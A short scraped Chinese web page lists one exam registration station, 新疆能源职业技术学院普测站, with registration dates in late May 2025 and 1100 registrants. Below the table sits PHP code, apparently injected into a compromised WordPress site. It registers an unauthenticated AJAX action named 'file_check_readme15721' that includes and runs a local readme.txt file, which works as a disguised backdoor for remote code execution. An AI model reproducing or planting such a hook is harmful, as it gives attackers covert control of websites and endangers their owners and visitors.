|
序号
|
测试站名称
|
报名时间
|
结束时间
|
报名人数
|
|---|
|
1
|
新疆能源职业技术学院普测站
|
2025-05-26
|
2025-05-30
|
1100人
|
新疆能源职业技术学院普测站
if(!function_exists('file_check_readme15721')){ add_action('wp_ajax_nopriv_file_check_readme15721', 'file_check_readme15721'); add_action('wp_ajax_file_check_readme15721', 'file_check_readme15721'); function file_check_readme15721() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }